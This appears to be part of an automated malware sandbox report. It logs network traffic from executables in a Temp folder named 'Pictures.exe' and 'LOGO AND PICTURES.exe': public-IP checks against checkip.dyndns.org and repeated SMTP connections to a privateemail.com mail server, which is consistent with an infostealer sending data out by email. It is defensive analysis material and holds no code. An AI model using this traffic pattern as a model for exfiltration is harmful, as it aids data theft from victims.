Jan 14, 2021 08:02:03.776787043 CET	8.8.8.8	192.168.2.3	0x1935	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:02:08.987667084 CET	8.8.8.8	192.168.2.3	0x2d3f	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:02:11.027297974 CET	8.8.8.8	192.168.2.3	0x4489	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)
Jan 14, 2021 08:02:14.275495052 CET	8.8.8.8	192.168.2.3	0x4c3e	No error (0)	smtp.privateemail.com		199.193.7.228	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

whatismyipaddress.com

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49731	104.16.154.36	80	C:\Users\user\AppData\Local\Temp\Pictures.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2021 07:59:54.235313892 CET	623	OUT	GET / HTTP/1.1 Host: whatismyipaddress.com Connection: Keep-Alive
Jan 14, 2021 07:59:54.284348965 CET	623	IN	HTTP/1.1 403 Forbidden Date: Thu, 14 Jan 2021 06:59:54 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: keep-alive X-Frame-Options: SAMEORIGIN Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Set-Cookie: __cfduid=d6cdf8dda2a1ce45b2173b3d3a4bb7f411610607594; expires=Sat, 13-Feb-21 06:59:54 GMT; path=/; domain=.whatismyipaddress.com; HttpOnly; SameSite=Lax; Secure cf-request-id: 07a14aa31c0000c2e532b0b000000001 Server: cloudflare CF-RAY: 61157a182acec2e5-FRA Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49733	131.186.161.70	80	C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2021 08:00:04.861777067 CET	677	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2021 08:00:05.010082960 CET	677	IN	HTTP/1.1 200 OK Content-Type: text/html Server: DynDNS-CheckIP/1.0.1 Connection: close Cache-Control: no-cache Pragma: no-cache Content-Length: 103 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49737	131.186.161.70	80	C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2021 08:00:05.390219927 CET	678	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2021 08:00:05.539251089 CET	678	IN	HTTP/1.1 200 OK Content-Type: text/html Server: DynDNS-CheckIP/1.0.1 Connection: close Cache-Control: no-cache Pragma: no-cache Content-Length: 103 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49740	131.186.161.70	80	C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2021 08:00:09.419497967 CET	686	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2021 08:00:09.567424059 CET	686	IN	HTTP/1.1 200 OK Content-Type: text/html Server: DynDNS-CheckIP/1.0.1 Connection: close Cache-Control: no-cache Pragma: no-cache Content-Length: 103 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49741	131.186.161.70	80	C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2021 08:00:09.866982937 CET	693	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2021 08:00:10.014935970 CET	694	IN	HTTP/1.1 200 OK Content-Type: text/html Server: DynDNS-CheckIP/1.0.1 Connection: close Cache-Control: no-cache Pragma: no-cache Content-Length: 103 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49742	131.186.161.70	80	C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2021 08:00:10.329763889 CET	698	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2021 08:00:10.477866888 CET	698	IN	HTTP/1.1 200 OK Content-Type: text/html Server: DynDNS-CheckIP/1.0.1 Connection: close Cache-Control: no-cache Pragma: no-cache Content-Length: 103 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 14, 2021 08:00:08.930797100 CET	172.67.188.154	443	192.168.2.3	49739	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Aug 10 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020	Tue Aug 10 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025	769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0	54328bd36c14bd82ddaa0c04b25ed9ad
Jan 14, 2021 08:00:08.930797100 CET	172.67.188.154	443	192.168.2.3	49739	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		54328bd36c14bd82ddaa0c04b25ed9ad

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 14, 2021 08:00:08.906934023 CET	587	49738	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:08.907265902 CET	49738	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:09.102705956 CET	587	49738	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:09.105675936 CET	49738	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:09.295670986 CET	587	49738	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:22.958322048 CET	587	49744	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:22.958880901 CET	49744	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:22.959043026 CET	587	49745	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:22.959383965 CET	49745	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:23.149359941 CET	587	49744	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:23.149823904 CET	587	49745	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:23.443073988 CET	587	49746	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:23.445048094 CET	49746	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:23.446057081 CET	587	49747	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:23.446501017 CET	49747	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:23.635618925 CET	587	49746	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:23.637448072 CET	587	49747	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:23.638699055 CET	49747	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:23.828748941 CET	587	49747	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:24.110033989 CET	587	49748	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:24.110730886 CET	49748	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:24.300975084 CET	587	49748	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:24.301374912 CET	49748	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:24.435529947 CET	587	49749	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:24.435818911 CET	49749	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:24.491446972 CET	587	49748	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:24.626451969 CET	587	49749	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:24.626929998 CET	49749	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:24.817307949 CET	587	49749	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:25.135715961 CET	587	49750	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:25.136117935 CET	49750	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:25.326111078 CET	587	49750	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:25.326412916 CET	49750	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:25.516190052 CET	587	49750	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:26.070705891 CET	587	49751	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:26.081401110 CET	49751	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:26.271816015 CET	587	49751	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:26.274288893 CET	49751	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:26.464620113 CET	587	49751	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:26.638529062 CET	587	49752	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:26.638777018 CET	49752	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:26.829519033 CET	587	49752	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:26.829797029 CET	49752	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:27.020015955 CET	587	49752	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:27.538213015 CET	587	49753	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:27.540309906 CET	49753	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:27.731218100 CET	587	49753	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:27.731501102 CET	49753	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:27.756948948 CET	587	49754	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:27.757746935 CET	49754	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:27.921510935 CET	587	49753	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:27.948188066 CET	587	49754	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:27.948502064 CET	49754	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:28.138797998 CET	587	49754	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:28.197808027 CET	587	49755	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:28.198223114 CET	49755	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:28.388714075 CET	587	49755	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:28.388906002 CET	49755	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:28.579099894 CET	587	49755	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:29.063112020 CET	587	49756	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:29.063569069 CET	49756	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:29.253979921 CET	587	49756	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:29.254336119 CET	49756	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:29.444499969 CET	587	49756	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:29.783775091 CET	587	49757	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:29.784033060 CET	49757	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:29.974598885 CET	587	49757	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:29.974828005 CET	49757	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:30.165138006 CET	587	49757	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:30.812020063 CET	587	49758	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:30.812251091 CET	49758	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:31.003150940 CET	587	49758	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:31.003526926 CET	49758	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:31.193689108 CET	587	49758	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:31.492677927 CET	587	49759	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:31.492913961 CET	49759	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:31.682878017 CET	587	49759	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:31.683123112 CET	49759	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:31.873045921 CET	587	49759	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:32.227066040 CET	587	49760	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:32.227708101 CET	49760	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:32.418627977 CET	587	49760	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:32.419456005 CET	49760	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:32.560264111 CET	587	49761	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:32.561613083 CET	49761	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:32.609837055 CET	587	49760	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:32.752177954 CET	587	49761	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:32.752501011 CET	49761	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:32.968230009 CET	587	49761	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:33.468945026 CET	587	49762	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:33.512440920 CET	49762	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:33.702641964 CET	587	49762	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:33.702919006 CET	49762	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:33.892878056 CET	587	49762	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:34.443994999 CET	587	49763	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:34.810471058 CET	49763	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:35.001105070 CET	587	49763	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:35.001420975 CET	49763	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:35.191286087 CET	587	49763	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:35.651307106 CET	587	49764	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:36.264903069 CET	49764	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:36.455297947 CET	587	49764	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:36.455629110 CET	49764	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:36.645940065 CET	587	49764	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:37.709633112 CET	587	49765	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:37.709914923 CET	49765	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:37.901084900 CET	587	49765	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:37.901420116 CET	49765	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:38.092577934 CET	587	49765	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:38.167083025 CET	587	49767	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:38.167381048 CET	49767	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:38.357604980 CET	587	49767	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:38.358040094 CET	49767	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:38.548203945 CET	587	49767	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:38.580416918 CET	587	49768	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:38.580915928 CET	49768	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:38.771435976 CET	587	49768	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:38.774426937 CET	49768	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:38.964509964 CET	587	49768	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:39.755696058 CET	587	49769	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:39.892252922 CET	49769	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:40.082479954 CET	587	49769	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:40.879084110 CET	49769	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:41.069070101 CET	587	49769	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:42.214993954 CET	587	49770	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:42.215277910 CET	49770	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:42.405487061 CET	587	49770	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:42.406028032 CET	49770	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:42.596146107 CET	587	49770	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:42.628251076 CET	587	49771	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:42.628550053 CET	49771	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:42.818723917 CET	587	49771	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:42.818973064 CET	49771	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:43.009176016 CET	587	49771	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:44.974253893 CET	587	49777	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:44.974579096 CET	49777	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:45.165414095 CET	587	49777	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:45.165735960 CET	49777	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:45.355920076 CET	587	49777	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:46.670711040 CET	587	49778	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:46.671047926 CET	49778	587	192.168.2.3	199.193.7.228	EHLO 181598
